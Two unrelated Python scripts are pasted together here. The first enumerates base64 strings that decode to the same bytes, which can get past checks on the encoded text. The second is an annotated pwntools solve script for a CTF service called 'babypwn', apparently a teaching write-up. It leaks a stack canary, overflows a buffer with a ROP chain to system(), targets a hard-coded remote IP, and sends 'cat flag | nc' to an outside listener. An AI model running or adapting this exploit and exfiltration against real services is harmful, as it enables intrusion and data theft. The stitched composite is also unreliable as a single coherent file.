from string import ascii_letters
from base64 import *
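# Enumerate single-character variants of a base64 string that decode to the
# same bytes as the original.
#
# Base64 text is not canonical. When the last group is padded, the final data
# character carries low bits that a lenient decoder throws away, so several
# distinct strings map to one decoded value. A check that compares the
# *encoded* text (deny-list, uniqueness or replay check) while the application
# later acts on the *decoded* bytes can be satisfied by such a variant.
# Comparing decoded bytes, or re-encoding the decoded value and requiring it to
# equal the input, enforces a single accepted form.
#
# Limitation: only ASCII letters are substituted. Digits, '+' and '/' are also
# base64 symbols, so this is not an exhaustive enumeration for other inputs.
ts = "TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5Oig="
# Per-character view of ts; only its length drives the position loop below.
target = list(ts)
# Decode the reference once instead of on every comparison.
reference = b64decode(ts)
# Every candidate that decodes to `reference`, in the order it is printed.
found = []
for i in range(len(target)):
    # Fresh copy per position so exactly one character differs from ts.
    tmp = list(ts)
    for letter in ascii_letters:
        tmp[i] = letter
        candidate = ''.join(tmp)
        if b64decode(candidate) == reference:
            # This also fires when `letter` is the original character, so the
            # unmodified string is reported once per letter position.
            found.append(candidate)
            # Parenthesised form prints the same text on Python 2 and 3.
            print(candidate)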
#!/usr/bin/python
from pwn import *
from struct import *
from time import *
# Annotated walkthrough of a CTF solve script for the "babypwn" service.
# As far as the script shows, it depends on three properties of the target:
#   1. an echo that runs past the end of the input and discloses the stack
#      canary,
#   2. a second write that appears to go past a 40-byte buffer and reach the
#      saved return address,
#   3. code addresses that are fixed and an imported system().
# Bounded, NUL-terminated reads address (1) and (2). Position-independent
# code and not linking system() address (3).

# Convert a 4-byte string to an unsigned 32-bit integer, little-endian ("<L").
up = lambda x : unpack("<L",x)[0]
# Load the target binary; `e` is not referenced again in the lines shown here.
e = ELF("./babypwn")
# Fixed addresses inside the binary. The names suggest a writable .bss
# location, the PLT stubs for recv() and system(), and a pop/pop/pop/pop/ret
# sequence -- TODO confirm against the binary. Hard-coded values only work if
# the image loads at a fixed base (presumably built without PIE).
bss = 0x0804b1b4
recv_plt = 0x080486e0
system_plt = 0x08048620
ppppr = 0x08048eec
# Return-address chain laid out as 32-bit stack arguments:
#   recv(4, bss, 100, 0) -> four-pop gadget clears the arguments -> system(bss)
# "DUMM" fills the return slot for system(). Descriptor 4 is presumably the
# accepted client socket -- verify against the server.
payload = ''
payload += p32(recv_plt)
payload += p32(ppppr)
payload += p32(4)
payload += p32(bss)
payload += p32(100)
payload += p32(0)
payload += p32(system_plt)
payload += "DUMM"
payload += p32(bss)
# Commented-out local endpoint left by the author, apparently for testing.
#p = remote('localhost',20001)
p = remote("110.10.212.130",8888)
# Stage 1 -- information leak. Menu option 1 echoes the message back. Forty
# filler bytes are sent (sendline appends a newline); the four bytes that
# follow the filler in the echo are read as the canary.
# NOTE(review): this implies the input is not NUL-terminated before it is
# echoed -- confirm in the binary.
p.recvuntil("Select menu > ")
p.sendline("1")
p.recvuntil("Input Your Message : ")
p.sendline("A"*40)
p.recvuntil("A"*40)
leak = p.recv(4)
print "[*] Leaked : " + hex(up(leak))
# The first leaked byte is replaced with \x00. Presumably the newline from
# sendline overwrote the canary's low byte, which is zero on common Linux
# toolchains -- TODO confirm.
canary = "\x00"+leak[1:]
print "[*] Canary : " + hex(up(canary))
# Stage 2 -- overwrite. Same menu path; the message is 40 filler bytes, the
# recovered canary, 12 more filler bytes, then the chain. The offsets 40 and
# 12 are specific to this binary's stack frame (assumed from the script).
p.recvuntil("Select menu > ")
p.sendline("1")
p.recvuntil("Input Your Message : ")
p.sendline("A"*40+canary+"A"*12+payload)
# Option 3 presumably makes the affected function return, at which point the
# overwritten return address is used -- TODO confirm.
p.recvuntil("Select menu > ")
p.sendline("3")
# Pause so the service is waiting in the chained recv() before data arrives.
sleep(0.5)
# This line is what the chained recv() stores at `bss` and system() then runs:
# it pipes the flag file to an external listener over nc. For detection, a
# network service spawning a shell and opening an outbound nc connection is a
# strong signal. Egress filtering on the host would block this channel.
p.sendline("cat flag | nc 52.199.49.117 44444")
p.close()